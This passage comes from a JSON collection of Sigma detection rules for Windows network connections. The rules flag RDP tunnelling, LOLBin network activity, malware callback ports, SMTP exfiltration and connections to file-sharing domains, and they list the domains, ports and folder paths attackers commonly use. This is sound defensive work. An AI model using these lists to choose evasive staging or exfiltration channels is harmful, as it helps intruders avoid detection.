Files\\Mozilla Firefox\\firefox.exe'\n    filter_optional_tsplus:  # Some RAS\n        Image:\n            - 'C:\\Program Files\\TSplus\\Java\\bin\\HTML5service.exe'\n            - 'C:\\Program Files (x86)\\TSplus\\Java\\bin\\HTML5service.exe'\n    filter_optional_null:\n        Image: null\n    filter_optional_empty:\n        Image: ''\n    filter_optional_unknown:\n        Image: '<unknown process>'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Third party RDP tools\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_rdp_reverse_tunnel.yml",
    "content": "title: RDP Over Reverse SSH Tunnel\nid: 5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4\nstatus: test\ndescription: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389\nreferences:\n    - https://twitter.com/cyb3rops/status/1096842275437625346\nauthor: Samir Bousseaden\ndate: 2019-02-16\nmodified: 2024-03-12\ntags:\n    - attack.command-and-control\n    - attack.t1572\n    - attack.lateral-movement\n    - attack.t1021.001\n    - car.2013-07-002\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\svchost.exe'\n        Initiated: 'true'\n        SourcePort: 3389\n    selection_destination:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '::1/128'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_rdp_to_http.yml",
    "content": "title: RDP to HTTP or HTTPS Target Ports\nid: b1e5da3b-ca8e-4adf-915c-9921f3d85481\nstatus: test\ndescription: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443\nreferences:\n    - https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg\n    - https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-29\nmodified: 2022-07-14\ntags:\n    - attack.command-and-control\n    - attack.t1572\n    - attack.lateral-movement\n    - attack.t1021.001\n    - car.2013-07-002\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n        Initiated: 'true'\n        SourcePort: 3389\n        DestinationPort:\n            - 80\n            - 443\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_regasm_network_activity.yml",
    "content": "title: RegAsm.EXE Initiating Network Connection To Public IP\nid: 0531e43a-d77d-47c2-b89f-5fe50321c805\nstatus: test\ndescription: Detects \"RegAsm.exe\" initiating a network connection to public IP adresses\nreferences:\n    - https://app.any.run/tasks/ec207948-4916-47eb-a0f4-4c6abb2e7668/\n    - https://research.splunk.com/endpoint/07921114-6db4-4e2e-ae58-3ea8a52ae93f/\n    - https://lolbas-project.github.io/lolbas/Binaries/Regasm/\nauthor: frack113\ndate: 2024-04-25\ntags:\n    - attack.defense-evasion\n    - attack.t1218.009\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith: '\\regasm.exe'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml",
    "content": "title: Network Connection Initiated By Regsvr32.EXE\nid: c7e91a02-d771-4a6d-a700-42587e0b1095\nstatus: test\ndescription: Detects a network connection initiated by \"Regsvr32.exe\"\nreferences:\n    - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/\n    - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/\nauthor: Dmitriy Lifanov, oscd.community\ndate: 2019-10-25\nmodified: 2023-09-18\ntags:\n    - attack.execution\n    - attack.t1559.001\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith: '\\regsvr32.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_remote_access_tools_anydesk_incoming_connection.yml",
    "content": "title: Remote Access Tool - AnyDesk Incoming Connection\nid: d58ba5c6-0ed7-4b9d-a433-6878379efda9\nstatus: experimental\ndescription: |\n    Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows\n    - https://asec.ahnlab.com/en/40263/\nauthor: '@d4ns4n_ (Wuerth-Phoenix)'\ndate: 2024-09-02\nmodified: 2025-02-24\ntags:\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\AnyDesk.exe'\n            - '\\AnyDeskMSI.exe'\n        Initiated: 'false' # If the network connection is initiated remotely (incoming), the field is set to false.\n    condition: selection\nfalsepositives:\n    - Legitimate incoming connections (e.g. sysadmin activity). Most of the time I would expect outgoing connections (initiated locally).\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml",
    "content": "title: Rundll32 Internet Connection\nid: cdc8da7d-c303-42f8-b08c-b4ab47230263\nstatus: test\ndescription: Detects a rundll32 that communicates with public IP addresses\nreferences:\n    - https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-11-04\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - attack.execution\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n        Initiated: 'true'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    filter_main_ms_ranges:\n        DestinationIp|cidr:\n            - '20.0.0.0/8' # Microsoft range, caused some FPs\n            - '51.103.0.0/16' # Microsoft AS8075 range, caused some FPs\n            - '51.104.0.0/16' # Microsoft AS8075 range, caused some FPs\n            - '51.105.0.0/16' # Microsoft AS8075 range, caused some FPs\n    filter_main_app_sdb:\n        CommandLine|endswith: '\\system32\\PcaSvc.dll,PcaPatchSdbTask'\n    filter_main_azure_managed:\n        SourceHostname|endswith: '.internal.cloudapp.net'\n    filter_main_svchost_update_processes:\n        # Note: This require \"ParentImage\" data enrichment.\n        ParentImage: 'C:\\Windows\\System32\\svchost.exe'\n        DestinationPort: 443\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Communication to other corporate systems that use IP addresses from public address spaces\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_silenttrinity_stager_msbuild_activity.yml",
    "content": "title: Silenttrinity Stager Msbuild Activity\nid: 50e54b8d-ad73-43f8-96a1-5191685b17a4\nstatus: test\ndescription: Detects a possible remote connections to Silenttrinity c2\nreferences:\n    - https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/\nauthor: Kiran kumar s, oscd.community\ndate: 2020-10-11\nmodified: 2022-10-05\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1127.001\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\msbuild.exe'\n    filter:\n        DestinationPort:\n            - 80\n            - 443\n        Initiated: 'true'\n    condition: selection and filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml",
    "content": "title: Suspicious Network Connection Binary No CommandLine\nid: 20384606-a124-4fec-acbb-8bd373728613\nstatus: test\ndescription: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters\nreferences:\n    - https://redcanary.com/blog/raspberry-robin/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-03\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith:\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\dllhost.exe'\n        CommandLine|endswith:\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\dllhost.exe'\n    filter_no_cmdline:\n        CommandLine: ''\n    filter_null: # e.g. Sysmon has no CommandLine field in network events with ID 3\n        CommandLine: null\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_file_sharing_domains_susp_folders.yml",
    "content": "title: Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder\nid: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97\nrelated:\n    - id: 635dbb88-67b3-4b41-9ea5-a3af2dd88153\n      type: obsolete\nstatus: test\ndescription: Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.\nreferences:\n    - https://twitter.com/M_haggis/status/900741347035889665\n    - https://twitter.com/M_haggis/status/1032799638213066752\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\n    - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a\n    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2018-08-30\nmodified: 2025-12-10\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection_paths:\n        Image|contains:\n            - ':\\$Recycle.bin'\n            - ':\\Perflogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Fonts\\'\n            - ':\\Windows\\IME\\'\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Temp\\'\n            - '\\config\\systemprofile\\'\n            - '\\Windows\\addins\\'\n    selection_domains:\n        Initiated: 'true'\n        DestinationHostname|endswith:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.co.nz'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    condition: all of selection_*\nfalsepositives:\n    - Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule.\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_initiated_uncommon_or_suspicious_locations.yml",
    "content": "title: Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location\nid: 7b434893-c57d-4f41-908d-6a17bf1ae98f\nstatus: test\ndescription: |\n    Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.\nreferences:\n    - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2017-03-19\nmodified: 2025-12-10\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|contains:\n            - ':\\$Recycle.bin'\n            - ':\\Perflogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Default\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Fonts\\'\n            - ':\\Windows\\IME\\'\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n            - '\\config\\systemprofile\\'\n            - '\\Contacts\\'\n            - '\\Favorites\\'\n            - '\\Favourites\\'\n            - '\\Music\\'\n            - '\\Pictures\\'\n            - '\\Videos\\'\n            - '\\Windows\\addins\\'\n    filter_main_domains:\n        # Note: We exclude these domains to avoid duplicate filtering from e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97\n        DestinationHostname|endswith:\n            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'ddns.net'\n            - 'dl.dropboxusercontent.com'\n            - 'ghostbin.co'\n            - 'github.com'\n            - 'glitch.me'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'mediafire.com'\n            - 'mega.co.nz'\n            - 'mega.nz'\n            - 'onrender.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'portmap.io'  # https://pro.twitter.com/JaromirHorejsi/status/1795001037746761892/photo/2\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'storage.googleapis.com'\n            - 'storjshare.io'\n            - 'supabase.co'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'ufile.io'\n            - 'w3spaces.com'\n            - 'workers.dev'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_malware_callback_port.yml",
    "content": "title: Potentially Suspicious Malware Callback Communication\nid: 4b89abaa-99fe-4232-afdd-8f9aa4d20382\nrelated:\n    - id: 6d8c3d20-a5e1-494f-8412-4571d716cf5c\n      type: similar\nstatus: test\ndescription: |\n    Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases\nreferences:\n    - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-19\nmodified: 2024-03-12\ntags:\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1571\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationPort:\n            - 100\n            - 198\n            - 200\n            - 243\n            - 473\n            - 666\n            - 700\n            - 743\n            - 777\n            - 1443\n            - 1515\n            - 1777\n            - 1817\n            - 1904\n            - 1960\n            - 2443\n            - 2448\n            - 3360\n            - 3675\n            - 3939\n            - 4040\n            - 4433\n            - 4438\n            - 4443\n            - 4444\n            - 4455\n            - 5445\n            - 5552\n            - 5649\n            - 6625\n            - 7210\n            - 7777\n            - 8143\n            - 8843\n            - 9631\n            - 9943\n            - 10101\n            - 12102\n            - 12103\n            - 12322\n            - 13145\n            - 13394\n            - 13504\n            - 13505\n            - 13506\n            - 13507\n            - 14102\n            - 14103\n            - 14154\n            - 49180\n            - 65520\n            - 65535\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    filter_optional_sys_directories:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml",
    "content": "title: Communication To Uncommon Destination Ports\nid: 6d8c3d20-a5e1-494f-8412-4571d716cf5c\nrelated:\n    - id: 4b89abaa-99fe-4232-afdd-8f9aa4d20382\n      type: similar\nstatus: test\ndescription: Detects programs that connect to uncommon destination ports\nreferences:\n    - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-19\nmodified: 2024-03-12\ntags:\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1571\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationPort:\n            - 8080\n            - 8888\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    filter_optional_sys_directories:\n        Image|startswith:\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_outbound_kerberos_connection.yml",
    "content": "title: Uncommon Outbound Kerberos Connection\nid: e54979bd-c5f9-4d6c-967b-a04b19ac4c74\nrelated:\n    - id: eca91c7c-9214-47b9-b4c5-cb1d7e4f2350\n      type: similar\nstatus: test\ndescription: |\n    Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.\nreferences:\n    - https://github.com/GhostPack/Rubeus\nauthor: Ilyas Ochkov, oscd.community\ndate: 2019-10-24\nmodified: 2024-03-15\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1558\n    - attack.lateral-movement\n    - attack.t1550.003\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationPort: 88\n        Initiated: 'true'\n    filter_main_lsass:\n        Image: 'C:\\Windows\\System32\\lsass.exe'\n    filter_optional_chrome:\n        Image:\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Image:\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n    filter_optional_tomcat:\n        Image|endswith: '\\tomcat\\bin\\tomcat8.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Web Browsers and third party application might generate similar activity. An initial baseline is required.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml",
    "content": "title: Microsoft Sync Center Suspicious Network Connections\nid: 9f2cc74d-78af-4eb2-bb64-9cd1d292b87b\nstatus: test\ndescription: Detects suspicious connections from Microsoft Sync Center to non-private IPs.\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-november-2021/\nauthor: elhoim\ndate: 2022-04-28\nmodified: 2024-03-12\ntags:\n    - attack.privilege-escalation\n    - attack.t1055\n    - attack.t1218\n    - attack.execution\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: network_connection\ndetection:\n    selection:\n        Image|endswith: '\\mobsync.exe'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml",
    "content": "title: Suspicious Outbound SMTP Connections\nid: 9976fa64-2804-423c-8a5b-646ade840773\nstatus: test\ndescription: |\n    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\n    The data may also be sent to an alternate network location from the main command and control server.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp\n    - https://www.ietf.org/rfc/rfc2821.txt\nauthor: frack113\ndate: 2022-01-07\nmodified: 2022-09-21\ntags:\n    - attack.exfiltration\n    - attack.t1048.003\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationPort:\n            - 25\n            - 587\n            - 465\n            - 2525\n        Initiated: 'true'\n    filter_clients:\n        Image|endswith:\n            - \\thunderbird.exe\n            - \\outlook.exe\n    filter_mailserver:\n        Image|startswith: 'C:\\Program Files\\Microsoft\\Exchange Server\\'\n    filter_outlook:\n        Image|startswith: 'C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_'\n        Image|endswith: '\\HxTsr.exe'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Other SMTP tools\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_susp_remote_powershell_session.yml",
    "content": "title: Potential Remote PowerShell Session Initiated\nid: c539afac-c12a-46ed-b1bd-5a5567c9f045\nstatus: test\ndescription: |\n    Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account.\n    This could potentially indicates a remote PowerShell connection.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2019-09-12\nmodified: 2024-02-02\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.lateral-movement\n    - attack.t1021.006\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationPort:\n            - 5985\n            - 5986\n        Initiated: 'true' # only matches of the initiating system can be evaluated\n        SourceIsIpv6: 'false'\n    filter_main_service_users:\n        - User|contains: # covers many language settings for Network Service. Please expand\n              - 'NETWORK SERVICE'\n              - 'NETZWERKDIENST'\n              - 'SERVICIO DE RED'\n              - 'SERVIZIO DI RETE'\n        - User|contains|all:\n              - 'SERVICE R'\n              - 'SEAU'\n    filter_main_localhost:\n        SourceIp:\n            - '::1'\n            - '127.0.0.1'\n        DestinationIp:\n            - '::1'\n            - '127.0.0.1'\n    filter_optional_avast:\n        Image:\n            - 'C:\\Program Files\\Avast Software\\Avast\\AvastSvc.exe'\n            - 'C:\\Program Files (x86)\\Avast Software\\Avast\\AvastSvc.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.\n    - Network Service user name of a not-covered localization\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_winlogon_net_connections.yml",
    "content": "title: Outbound Network Connection To Public IP Via Winlogon\nid: 7610a4ea-c06d-495f-a2ac-0a696abcfd3b\nstatus: test\ndescription: Detects a \"winlogon.exe\" process that initiate network communications with public IP addresses\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/\nauthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io\ndate: 2023-04-28\nmodified: 2024-03-12\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.command-and-control\n    - attack.t1218.011\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\winlogon.exe'\n        Initiated: 'true'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Communication to other corporate systems that use IP addresses from public address spaces\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_wordpad_uncommon_ports.yml",
    "content": "title: Suspicious Wordpad Outbound Connections\nid: 786cdae8-fefb-4eb2-9227-04e34060db01\nstatus: test\ndescription: |\n    Detects a network connection initiated by \"wordpad.exe\" over uncommon destination ports.\n    This might indicate potential process injection activity from a beacon or similar mechanisms.\nreferences:\n    - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit\nauthor: X__Junior (Nextron Systems)\ndate: 2023-07-12\nmodified: 2023-12-15\ntags:\n    - attack.defense-evasion\n    - attack.command-and-control\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith: '\\wordpad.exe'\n    filter_main_ports:\n        DestinationPort:\n            - 80\n            - 139\n            - 443\n            - 445\n            - 465\n            - 587\n            - 993\n            - 995\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Other ports can be used, apply additional filters accordingly\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_wscript_cscript_local_connection.yml",
    "content": "title: Local Network Connection Initiated By Script Interpreter\nid: 08249dc0-a28d-4555-8ba5-9255a198e08c\nrelated:\n    - id: 992a6cae-db6a-43c8-9cec-76d7195c96fc\n      type: derived\nstatus: test\ndescription: |\n    Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md\nauthor: frack113\ndate: 2022-08-28\nmodified: 2024-05-31\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n        # Note: This list is added to avoid duplicate alerting with 992a6cae-db6a-43c8-9cec-76d7195c96fc\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    condition: selection\nfalsepositives:\n    - Legitimate scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_wscript_cscript_outbound_connection.yml",
    "content": "title: Outbound Network Connection Initiated By Script Interpreter\nid: 992a6cae-db6a-43c8-9cec-76d7195c96fc\nrelated:\n    - id: 08249dc0-a28d-4555-8ba5-9255a198e08c\n      type: derived\nstatus: test\ndescription: Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2022-08-28\nmodified: 2024-03-13\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        Image|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n    filter_main_local_ranges:\n        DestinationIp|cidr:\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '169.254.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    filter_main_ms_ranges:\n        DestinationIp|cidr: '20.0.0.0/11' # Microsoft range, caused some FPs\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate scripts\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml",
